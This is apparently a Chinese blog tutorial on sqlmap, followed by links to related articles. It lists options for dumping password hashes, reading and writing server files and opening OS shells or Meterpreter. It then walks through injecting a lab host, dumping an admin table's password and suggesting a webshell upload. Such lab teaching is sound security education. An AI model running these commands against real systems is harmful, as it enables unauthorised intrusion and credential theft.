sqlmap注入入门

sqlmap的用法:

​ linux中: sqlmap [选项]

​ Windows中: python sqlmap [选项]

常用的参数及含义:

  • 目标

    ​ -d DIRECT 直接连接数据库

    ​ -u URL, --url=URL 目标 URL(例如:"http://www.site.com/vuln.php?id=1")

    ​ -l LOGFILE 从 Burp 或 WebScarab 代理的日志文件中解析目标地址

    ​ -x SITEMAPURL 从远程网站地图(.xml)文件中解析目标

    ​ -m BULKFILE 从文本文件中获取批量目标

    ​ -r REQUESTFILE 从文件中读取 HTTP 请求

    ​ -g GOOGLEDORK 使用 Google dork 结果作为目标

    ​ -c CONFIGFILE 从 INI 配置文件中加载选项

  • 枚举:

    ​ 以下选项用于获取后端数据库管理系统的信息,结构和数据表中的数据。此外,还可以运行你输入的 SQL 语句

    ​ a, --all 获取所有信息、数据

    ​ -b, --banner 获取 DBMS banner

    ​ --current-user 获取 DBMS 当前用户

    ​ --current-db 获取 DBMS 当前数据库

    ​ --hostname 获取 DBMS 服务器的主机名

    ​ --is-dba 探测 DBMS 当前用户是否为 DBA(数据库管理员)

    ​ --users 枚举出 DBMS 所有用户

    ​ --passwords 枚举出 DBMS 所有用户的密码哈希

    ​ --sql-query=QUERY 指定要执行的 SQL 语句

    ​ --sql-shell 调出交互式 SQL shell

    ​ --sql-file=SQLFILE 执行文件中的 SQL 语句

  • 暴力破解:

    ​ 以下选项用于暴力破解测试

    ​ --common-tables 检测常见的表名是否存在

    ​ --common-columns 检测常用的列名是否存在

  • 访问文件系统:

    ​ 以下选项用于访问后端数据库管理系统的底层文件系统

    ​ --file-read=RFILE 读取后端 DBMS 文件系统中的文件

    ​ --file-write=WFILE 写入后端 DBMS 文件系统中的文件

    ​ --file-dest=DFILE 使用文件绝对路径写入到后端 DBMS

  • 访问操作系统:

    ​ 以下选项用于访问后端数据库管理系统的底层操作系统

    ​ --os-cmd=OSCMD 执行操作系统命令

    ​ --os-shell 调出交互式操作系统 shell

    ​ --os-pwn 调出 OOB shell,Meterpreter 或 VNC

    ​ --os-smbrelay 一键调出 OOB shell,Meterpreter 或 VNC

    靶机实战
    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11

可以得出目标主机是Ubuntu,web服务为apache,数据库管理系统是MySQL以及它们的版本信息。

  1. 列举出DBMS中所有的数据库

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --dbs

  1. 获取DBMS当前数据库

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --current-db

  1. 列举出test数据库中的所有表名

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 -D test --tables
    


 我们发现了一个admin表,猜测其中可能有网站管路员的密码信息

  1. 查询admin表中的所有信息

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --sql-query="select * from test.admin;"



 我们获得了admin账户的密码,为mysql,我们可以利用admin用户,向目标服务器上传一句话木马,获取webshell。(可以自行百度“一句话木马”)

  1. 调出交互式SQL shell

    root@kaliwifi:~# sqlmap -u http://192.168.214.133/search.php?id=11 --sql-shell

在sql-shell可以执行sql查询语句

    select * from test.admin;

和第四步得到的结果是一样的

小结

利用SQLmap可以进行简单的sql注入,方便快捷。利用sqlmap可以查看目标机器的os,DBMS等。还可以可以枚举数据库、表、列。以上结果只是为了演示sqlmap的基本用法,在实际操作中很可能注入失败,可以进一步的查看sqlmap wiki。

sqlmap注入入门的更多相关文章

  1. sqlmap注入小结

    sqlmap注入时: 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可 ...

  2. 使用sqlmap注入DVWA的SQL Injection菜单

    1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用a ...

  3. SQLMAP注入教程-11种常见SQLMAP使用方法详解

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直 ...

  4. sqlmap注入教程

    1.SQLMAP用于Access数据库注入 (1)猜解是否能注入win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorB ...

  5. sqlmap 注入的方法及技巧

    sqlmap 注入的方法及技巧 当给 sqlmap 这么一个 url 的时候,它会: 1.判断可注入的参数 2.判断可以用那种 SQL 注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些 ...

  6. Sqlmap注入工具

    Sqlmap注入工具 http://sqlmap.org/ Sqlmap是国外的一个免费的注入工具,基于python开发,支持现在几乎所有的数据库,支持get.post.cookie注入,可以添加co ...

  7. 在windows系统和kali中通过sqlmap注入

    第1章 在windows系统中通过sqlmap注入 1.1 环境搭建 Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux, 由于sqlmap是基于Pyt ...

  8. sql-labs 18-20(sqlmap注入)

    这三题主要是关于HTTP头部的注入 常见的HTTP注入点产生位置为 [Referer].[X-Forwarded-For].[Cookie].[X-Real-IP].[Accept-Language] ...

  9. sqlmap:入门(手工注入)

    一. 联合查询注入union(less-1) 1. union操作符用于合并两个或多个select语句结果集: 2. union后的select语句必须拥有和最前的select语句拥有相同数量的字段, ...

随机推荐

  1. Linux云计算运维-MySQL

    0.建初心 优秀DBA的素质 1.人品,不做某些事情2.严谨,运行命令前深思熟虑,三思而后行,即使是依据select3.细心,严格按照步骤一步一步执行,减少出错4.心态,遇到灾难,首先要稳住,不慌张, ...

  2. [已解决]python FileNotFoundError: [WinError 3] for getsize(filepath)

    问题代码: def sourceStatic(path, exclude): # exclude list convert to lower exclude = list(map(lambda x:x ...

  3. nginx配置文件详细解读

    https://m.w3cschool.cn/nginx/nginx-d1aw28wa.html ######Nginx配置文件nginx.conf中文详解##### #定义Nginx运行的用户和用户 ...

  4. 华为笔记HOSTS,便于访问云端存储

    # Copyright (c) - Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windo ...

  5. linux 基本命令2

    linux没有磁盘的概念,这一点不同于windows,Linux所有的文件系统采用树的结构完成(核心本质)树自然有根节点 也就是linux存在一个根目录,用/表示ls 表示查看命令 我们使用 ls / ...

  6. react中的this.setState()

    修改组件的状态可以使用的一些方法: 1.比较常用的 this.setState({ message:"你好" }) 2.state更新是异步的时候 因为this.props和thi ...

  7. WMI入门教程之WMI中的类在哪里?

    Powershell专栏: https://www.jb51.net/list/list_234_1.htm https://www.pstips.net/get-wmiobject-becomes- ...

  8. python之路8-内置模块介绍

    time & datetime模块 1 #_*_coding:utf-8_*_ 2 __author__ = 'Alex Li' 3 4 import time 5 6 7 # print(t ...

  9. 网站PWA升级

    前面的话 渐进式网络应用 ( Progressive Web Apps ),即我们所熟知的 PWA,是 Google 提出的用前沿的 Web 技术为网页提供 App 般使用体验的一系列方案.PWA 本 ...

  10. torch.view()详解及-1参数是什么意思

    经常可以看到调用torch.view(-1,28*28)之类的调用,那么这里的-1是什么意思呢,经过查看文档view()得到了一下结果: view()返回的数据和传入的tensor一样,只是形状不同 ...